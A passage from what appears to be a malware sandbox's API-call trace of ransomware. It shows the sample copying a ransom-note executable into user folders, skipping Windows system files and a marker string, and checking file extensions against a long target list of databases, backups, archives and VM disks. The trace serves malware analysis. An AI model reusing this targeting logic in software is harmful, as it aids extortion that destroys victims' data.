hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.084] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.084] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.084] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.084] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.084] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0060.084] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\NetHood", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\NetHood") returned="C:\\Users\\Default User\\NetHood" [0060.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e63f0 | out: hHeap=0x2b0000) returned 1 [0060.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0060.085] lstrlenW (lpString="C:\\Users\\Default User\\NetHood") returned 29 [0060.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\NetHood" | out: lpString1="C:\\Users\\Default User\\NetHood") returned="C:\\Users\\Default User\\NetHood" [0060.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\NetHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\nethood\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.086] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.086] GetLastError () returned 0x0 [0060.086] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.086] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.086] CloseHandle (hObject=0x12c) returned 1 [0060.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.086] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.086] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\NetHood\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.086] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.087] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.087] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.087] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.087] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.087] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.087] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.087] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.087] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49eeef60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.087] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.087] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49eeef60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.087] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.087] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0060.087] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\My Documents", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents") returned="C:\\Users\\Default User\\My Documents" [0060.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0060.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0060.087] lstrlenW (lpString="C:\\Users\\Default User\\My Documents") returned 34 [0060.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents" | out: lpString1="C:\\Users\\Default User\\My Documents") returned="C:\\Users\\Default User\\My Documents" [0060.087] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.087] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.088] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.088] GetLastError () returned 0x0 [0060.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.088] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.088] CloseHandle (hObject=0x12c) returned 1 [0060.088] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.088] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.088] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.089] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.089] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.089] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.089] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.089] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.089] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.089] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.089] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.089] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.089] lstrlenW (lpString="desktop.ini") returned 11 [0060.089] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\*") returned 36 [0060.089] lstrcpyW (in: lpString1=0x2cce446, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.089] lstrlenW (lpString="desktop.ini") returned 11 [0060.089] lstrlenW (lpString="Ares865") returned 7 [0060.089] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.089] lstrlenW (lpString=".dll") returned 4 [0060.089] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.089] lstrlenW (lpString=".lnk") returned 4 [0060.090] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.090] lstrlenW (lpString=".ini") returned 4 [0060.090] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.090] lstrlenW (lpString=".sys") returned 4 [0060.090] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.090] lstrlenW (lpString="desktop.ini") returned 11 [0060.090] lstrlenW (lpString="bak") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.090] lstrlenW (lpString="ba_") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.090] lstrlenW (lpString="dbb") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.090] lstrlenW (lpString="vmdk") returned 4 [0060.090] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.090] lstrlenW (lpString="rar") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.090] lstrlenW (lpString="zip") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.090] lstrlenW (lpString="tgz") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.090] lstrlenW (lpString="vbox") returned 4 [0060.090] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.090] lstrlenW (lpString="vdi") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.090] lstrlenW (lpString="vhd") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.090] lstrlenW (lpString="vhdx") returned 4 [0060.090] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.090] lstrlenW (lpString="avhd") returned 4 [0060.090] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.090] lstrlenW (lpString="db") returned 2 [0060.090] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.090] lstrlenW (lpString="db2") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.090] lstrlenW (lpString="db3") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.090] lstrlenW (lpString="dbf") returned 3 [0060.090] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.091] lstrlenW (lpString="mdf") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.091] lstrlenW (lpString="mdb") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.091] lstrlenW (lpString="sql") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.091] lstrlenW (lpString="sqlite") returned 6 [0060.091] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.091] lstrlenW (lpString="sqlite3") returned 7 [0060.091] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.091] lstrlenW (lpString="sqlitedb") returned 8 [0060.091] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.091] lstrlenW (lpString="xml") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.091] lstrlenW (lpString="$er") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.091] lstrlenW (lpString="4dd") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.091] lstrlenW (lpString="4dl") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.091] lstrlenW (lpString="^^^") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.091] lstrlenW (lpString="abs") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.091] lstrlenW (lpString="abx") returned 3 [0060.091] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.091] lstrlenW (lpString="accdb") returned 5 [0060.091] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.091] lstrlenW (lpString="accdc") returned 5 [0060.091] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.091] lstrlenW (lpString="accde") returned 5 [0060.091] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.091] lstrlenW (lpString="accdr") returned 5 [0060.091] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.091] lstrlenW (lpString="accdt") returned 5 [0060.091] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.091] lstrlenW (lpString="accdw") returned 5 [0060.092] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.092] lstrlenW (lpString="accft") returned 5 [0060.092] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.092] lstrlenW (lpString="adb") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.092] lstrlenW (lpString="adb") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.092] lstrlenW (lpString="ade") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.092] lstrlenW (lpString="adf") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.092] lstrlenW (lpString="adn") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.092] lstrlenW (lpString="adp") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.092] lstrlenW (lpString="alf") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.092] lstrlenW (lpString="ask") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.092] lstrlenW (lpString="btr") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.092] lstrlenW (lpString="cat") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.092] lstrlenW (lpString="cdb") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.092] lstrlenW (lpString="ckp") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.092] lstrlenW (lpString="cma") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.092] lstrlenW (lpString="cpd") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.092] lstrlenW (lpString="dacpac") returned 6 [0060.092] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.092] lstrlenW (lpString="dad") returned 3 [0060.092] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.092] lstrlenW (lpString="dadiagrams") returned 10 [0060.092] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.092] lstrlenW (lpString="daschema") returned 8 [0060.093] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.093] lstrlenW (lpString="db-journal") returned 10 [0060.093] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.093] lstrlenW (lpString="db-shm") returned 6 [0060.093] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.093] lstrlenW (lpString="db-wal") returned 6 [0060.093] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.093] lstrlenW (lpString="dbc") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.093] lstrlenW (lpString="dbs") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.093] lstrlenW (lpString="dbt") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.093] lstrlenW (lpString="dbv") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.093] lstrlenW (lpString="dbx") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.093] lstrlenW (lpString="dcb") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.093] lstrlenW (lpString="dct") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.093] lstrlenW (lpString="dcx") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.093] lstrlenW (lpString="ddl") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.093] lstrlenW (lpString="dlis") returned 4 [0060.093] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.093] lstrlenW (lpString="dp1") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.093] lstrlenW (lpString="dqy") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.093] lstrlenW (lpString="dsk") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.093] lstrlenW (lpString="dsn") returned 3 [0060.093] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.093] lstrlenW (lpString="dtsx") returned 4 [0060.093] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.093] lstrlenW (lpString="dxl") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.094] lstrlenW (lpString="eco") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.094] lstrlenW (lpString="ecx") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.094] lstrlenW (lpString="edb") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.094] lstrlenW (lpString="epim") returned 4 [0060.094] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.094] lstrlenW (lpString="fcd") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.094] lstrlenW (lpString="fdb") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.094] lstrlenW (lpString="fic") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.094] lstrlenW (lpString="flexolibrary") returned 12 [0060.094] lstrlenW (lpString="fm5") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.094] lstrlenW (lpString="fmp") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.094] lstrlenW (lpString="fmp12") returned 5 [0060.094] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.094] lstrlenW (lpString="fmpsl") returned 5 [0060.094] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.094] lstrlenW (lpString="fol") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.094] lstrlenW (lpString="fp3") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.094] lstrlenW (lpString="fp4") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.094] lstrlenW (lpString="fp5") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.094] lstrlenW (lpString="fp7") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.094] lstrlenW (lpString="fpt") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.094] lstrlenW (lpString="frm") returned 3 [0060.094] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.095] lstrlenW (lpString="gdb") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.095] lstrlenW (lpString="gdb") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.095] lstrlenW (lpString="grdb") returned 4 [0060.095] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.095] lstrlenW (lpString="gwi") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.095] lstrlenW (lpString="hdb") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.095] lstrlenW (lpString="his") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.095] lstrlenW (lpString="ib") returned 2 [0060.095] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.095] lstrlenW (lpString="idb") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.095] lstrlenW (lpString="ihx") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.095] lstrlenW (lpString="itdb") returned 4 [0060.095] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.095] lstrlenW (lpString="itw") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.095] lstrlenW (lpString="jet") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.095] lstrlenW (lpString="jtx") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.095] lstrlenW (lpString="kdb") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.095] lstrlenW (lpString="kexi") returned 4 [0060.095] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.095] lstrlenW (lpString="kexic") returned 5 [0060.095] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.095] lstrlenW (lpString="kexis") returned 5 [0060.095] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.095] lstrlenW (lpString="lgc") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.095] lstrlenW (lpString="lwx") returned 3 [0060.095] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.096] lstrlenW (lpString="maf") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.096] lstrlenW (lpString="maq") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.096] lstrlenW (lpString="mar") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.096] lstrlenW (lpString="marshal") returned 7 [0060.096] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.096] lstrlenW (lpString="mas") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.096] lstrlenW (lpString="mav") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.096] lstrlenW (lpString="maw") returned 3 [0060.096] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.096] lstrlenW (lpString="mdbhtml") returned 7 [0060.096] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.096] lstrlenW (lpString="mdn") returned 3 [0060.096] lstrcmpiW 